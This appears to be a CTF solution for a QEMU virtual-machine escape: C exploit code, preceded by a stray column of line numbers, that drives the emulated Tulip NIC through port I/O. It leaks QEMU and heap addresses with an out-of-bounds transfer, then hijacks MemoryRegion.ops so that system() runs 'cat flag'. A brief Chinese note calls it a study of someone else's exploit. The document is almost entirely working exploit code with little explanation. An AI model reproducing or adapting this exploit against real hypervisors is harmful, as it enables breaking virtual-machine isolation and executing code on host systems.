54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
#include <stdio.h>
#include <string.h>
#include <stdint.h>
#include <stdlib.h>
#include <fcntl.h>
#include <assert.h>
#include <inttypes.h>
#include <sys/io.h>

#define PAGE_SHIFT 12
#define PAGE_SIZE (1 << PAGE_SHIFT) // 4096
#define PFN_PRESENT (1ull << 63)
#define PFN_PFN ((1ull << 55) - 1)

#define PMIO_BASE 0x000000000000c000
#define CSR(_x) ((_x) << 3)
#define CSR5_TS_SUSPENDED 6

#if 0

tulip_write ->
tulip_xmit_list_update ->
tulip_copy_tx_buffers ->
pci_dma_read(&s->dev, desc->buf_addr1, s->tx_frame + s->tx_frame_len, len1); ->

static uint32_t tulip_ts(TULIPState *s)
{
return (s->csr[5] >> CSR5_TS_SHIFT) & CSR5_TS_MASK;
}

#endif

struct tulip_descriptor {
uint32_t status;
uint32_t control;
uint32_t buf_addr1;
uint32_t buf_addr2;
};

int fd;

uint32_t page_offset(uint32_t addr) {
return addr & ((1 << PAGE_SHIFT) - 1);
}

uint64_t gva_to_gfn(void *addr) {
uint64_t pme, gfn;
size_t offset;
offset = ((uintptr_t)addr >> 9) & ~7;
lseek(fd, offset, SEEK_SET);
read(fd, &pme, 8);
if (!(pme & PFN_PRESENT))
return -1;
gfn = pme & PFN_PFN;
return gfn;
}

uint64_t gva_to_gpa(void *addr) {
uint64_t gfn = gva_to_gfn(addr);
assert(gfn != -1);
return (gfn << PAGE_SHIFT) | page_offset((uint64_t)addr);
}

uint64_t pmio_read(uint64_t port) {
uint64_t val;
val = inw(PMIO_BASE + port);
return val;
}

void pmio_write(uint64_t port, uint64_t val) {
outw(val, PMIO_BASE + port);
}

void pmio_writel(uint64_t port, uint64_t val) {
outl(val, PMIO_BASE + port);
}

int main(int argc, char **argv) {
printf("[*] enter stage1\n");
int ret = 0;
fd = open("/proc/self/pagemap", O_RDONLY);
if (fd < 0) {
perror("open");
exit(1);
}
iopl(3);

// allocate descriptor
struct tulip_descriptor *tx_desc = malloc(sizeof(struct tulip_descriptor));
struct tulip_descriptor *rx_desc = malloc(sizeof(struct tulip_descriptor));

char *recv_buf = malloc(0x9000);
char *buf = malloc(0x1000);
memset(buf, 'A', 0x1000);
memset(recv_buf, 'B', 0x9000);

int len1 = 0x400 << 0;
int len2 = 0 << 11;
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->control = len2 | len1 | (1UL << 29) | (1UL << 24); // TDES1_FS, clean tx_frame_len
tx_desc->buf_addr1 = gva_to_gpa(buf);
tx_desc->buf_addr2 = 0x180;
printf("[*] desc: 0x%x\n", tx_desc->buf_addr1);

// get the physical address of the descriptor
uint64_t tx_desc_gpa = gva_to_gpa(tx_desc);
printf("[*] tx_desc_gpa: 0x%lx\n", tx_desc_gpa);

// set CSR5_TS_SUSPENDED
pmio_writel(CSR(6), 1u << 13); // CSR6_ST

// set tx descriptor
sleep(1);
pmio_writel(CSR(4), tx_desc_gpa); // tx_frame_len should be 0x400 now

printf("[*] fill tx_frame\n");

// set tx descriptor
sleep(1);
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->control = len2 | len1 | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(buf);
tx_desc->buf_addr2 = 0x180;
pmio_writel(CSR(4), tx_desc_gpa); // tx_frame_len shoule be 0x800 now

// tulip_tx: tulip_receive(s, s->tx_frame, s->tx_frame_len);
printf("[*] clean CSR5\n");
pmio_writel(CSR(5), 0xffffffff);
pmio_write(CSR(6), 0x800 | (1u << 13) | (1u << 1)); // CSR6_OM_SHIFT trigger tulip_receive

sleep(1);
printf("[*] OOB write tx_frame_len...\n");

int rx_len1, rx_len2;
rx_len1 = 0x400;
rx_len2 = 0;
rx_desc->status = (1UL << 31) | (1UL << 24); // RDES0_OWN
rx_desc->buf_addr1 = gva_to_gpa(recv_buf);
rx_desc->buf_addr2 = 0x180;
rx_desc->control = rx_len2 | rx_len1 | (1UL << 24) | (1UL << 30);

// set rx descriptor
sleep(1);
uint64_t rx_desc_gpa = gva_to_gpa(rx_desc);
printf("[*] rx_desc_gpa: 0x%lx\n", rx_desc_gpa);
pmio_writel(CSR(3), rx_desc_gpa);

struct oob_data { // control the following fields in TULIPState
int tx_frame_len;
int rx_frame_len;
int rx_frame_size;

uint32_t rx_status;
uint8_t filter[16][6];
};
len1 = sizeof(struct oob_data);
struct oob_data *oob_data = malloc(sizeof(struct oob_data));
oob_data->tx_frame_len = 0x800 - len1;
oob_data->rx_frame_len = 0x900;
oob_data->rx_frame_size = 2048*2 + 0x900;
for (int i = 0; i < 16; i++) { // bypass some stuff
oob_data->filter[i][0] = 'A';
oob_data->filter[i][1] = 'A';
oob_data->filter[i][2] = 'A';
oob_data->filter[i][3] = 'A';
oob_data->filter[i][4] = 'A';
oob_data->filter[i][5] = 'A';
}

tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(oob_data);
tx_desc->buf_addr2 = 0x180;
tx_desc->control = len2 | len1 | (1UL << 24) | (1UL << 30);

// set tx descriptor
sleep(1);
pmio_writel(CSR(4), tx_desc_gpa);

printf("[+] leak\n");
char *cur = (char *)recv_buf;
for (int i = 0; i < 50; ++i) {
printf("0x%016lx 0x%016lx\n", *(size_t *)cur, *(size_t *)(cur+8));
cur += 16;
}
cur = (char *)recv_buf;
uint64_t qemu_base = ((uint64_t *)cur)[0x1d] - 0x755f9f;
uint64_t heap_base = ((uint64_t *)cur)[22] - 0xe11380;
uint64_t qemu_plt_system = qemu_base+2859620;
uint64_t frame_base = heap_base+0xe0fcf0;
printf("[*] continue...\n");
printf("[+] qemu_base: 0x%lx\n", qemu_base);
printf("[+] heap_base: 0x%lx\n", heap_base);

printf("[*] enter stage2\n"); {
len1 = 0x400 << 0;
len2 = 0 << 11;
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->control = len2 | len1 | (1UL << 29) | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(buf);
tx_desc->buf_addr2 = 0x180;
printf("[*] desc: 0x%x\n", tx_desc->buf_addr1);

uint64_t tx_desc_gpa = gva_to_gpa(tx_desc);
printf("[*] tx_desc_gpa: 0x%lx\n", tx_desc_gpa);

// CSR5_TS_SUSPENDED
pmio_writel(CSR(6), 1u << 13); // CSR6_ST

// set tx descriptor
sleep(1);
pmio_writel(CSR(4), tx_desc_gpa);

printf("[*] fill tx_frame\n");

// set tx descriptor
sleep(1);
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->control = len2 | len1 | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(buf);
tx_desc->buf_addr2 = 0x180;
pmio_writel(CSR(4), tx_desc_gpa);

// tulip_tx: tulip_receive(s, s->tx_frame, s->tx_frame_len);
printf("[*] clean CSR5\n");
pmio_writel(CSR(5), 0xffffffff);

len1 = sizeof(struct oob_data);
struct oob_data *oob_data = malloc(sizeof(struct oob_data));
oob_data->tx_frame_len = -0x3350 - 0x70;
oob_data->rx_frame_len = 0;
oob_data->rx_frame_size = 0;
for (int i = 0; i < 16; i++) { // bypass some stuff
oob_data->filter[i][0] = 0xff;
oob_data->filter[i][1] = 0xff;
oob_data->filter[i][2] = 0xff;
oob_data->filter[i][3] = 0xff;
oob_data->filter[i][4] = 0xff;
oob_data->filter[i][5] = 0xff;
}

tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(oob_data);
tx_desc->buf_addr2 = 0x180;
tx_desc->control = len2 | len1 | (1UL << 24);

// set tx descriptor
sleep(1);
pmio_writel(CSR(4), tx_desc_gpa);

sleep(1);
uint64_t *binsh = (uint64_t *)malloc(0x200);
binsh[0] = 7449354444534473059; // catflag
binsh[1] = 0;
len1 = 16;
len2 = 0;
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(binsh);
tx_desc->buf_addr2 = 0x180;
tx_desc->control = len2 | len1 | (1UL << 24);
pmio_writel(CSR(4), tx_desc_gpa);
}

// now control MemoryRegion.ops
printf("[*] enter stage3\n"); {
((uint64_t *)buf)[0] = qemu_plt_system;
((uint64_t *)buf)[1] = qemu_plt_system;

((uint64_t *)buf)[2] = 0;
((uint64_t *)buf)[3] = 0;

((uint64_t *)buf)[4] = 2;
((uint64_t *)buf)[5] = 0;

((uint64_t *)buf)[6] = 0;
((uint64_t *)buf)[7] = 0;

((uint64_t *)buf)[8] = 0x0000000400000004;
((uint64_t *)buf)[9] = 0;

((uint64_t *)buf)[10] = 0;
((uint64_t *)buf)[11] = 0;
len1 = 0x400 << 0;
len2 = 0 << 11;
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->control = len2 | len1 | (1UL << 29) | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(buf);
tx_desc->buf_addr2 = 0x180;
printf("[*] desc: 0x%x\n", tx_desc->buf_addr1);

uint64_t tx_desc_gpa = gva_to_gpa(tx_desc);
printf("[*] tx_desc_gpa: 0x%lx\n", tx_desc_gpa);

// CSR5_TS_SUSPENDED
pmio_writel(CSR(6), 1u << 13); // CSR6_ST

// set tx descriptor
sleep(1);
pmio_writel(CSR(4), tx_desc_gpa);

printf("[*] fill tx_frame\n");

// set tx descriptor
sleep(1);
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->control = len2 | len1 | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(buf);
tx_desc->buf_addr2 = 0x180;
pmio_writel(CSR(4), tx_desc_gpa);

// tulip_tx: tulip_receive(s, s->tx_frame, s->tx_frame_len);
printf("[*] clean CSR5\n");
pmio_writel(CSR(5), 0xffffffff);

len1 = sizeof(struct oob_data);
struct oob_data *oob_data = malloc(sizeof(struct oob_data));
oob_data->tx_frame_len = -0x2a28-0x70; // now points to the MemoryRegion.ops
oob_data->rx_frame_len = 0;
oob_data->rx_frame_size = 0;
for (int i = 0; i < 16; i++) { // bypass some stuff
oob_data->filter[i][0] = 0xff;
oob_data->filter[i][1] = 0xff;
oob_data->filter[i][2] = 0xff;
oob_data->filter[i][3] = 0xff;
oob_data->filter[i][4] = 0xff;
oob_data->filter[i][5] = 0xff;
}

tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(oob_data);
tx_desc->buf_addr2 = 0x180;
tx_desc->control = len2 | len1 | (1UL << 24);

// set tx descriptor
sleep(1);
pmio_writel(CSR(4), tx_desc_gpa);

sleep(1);
printf("[*] hijack ops\n");
uint64_t *fake_memory_region_ops = (uint64_t *)malloc(0x200);
fake_memory_region_ops[0] = frame_base;
len1 = 8;
len2 = 0;
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(fake_memory_region_ops);
tx_desc->buf_addr2 = 0x180;
tx_desc->control = len2 | len1 | (1UL << 24);
pmio_writel(CSR(4), tx_desc_gpa);

// trigger the ops.write
pmio_writel(CSR(4), tx_desc_gpa);
}

return 0;
}

小结:

刚刚入门 qemu 逃逸,理解并调试了下别人的 exp(本题目没有移除调试符号,调试起来还是很轻松的)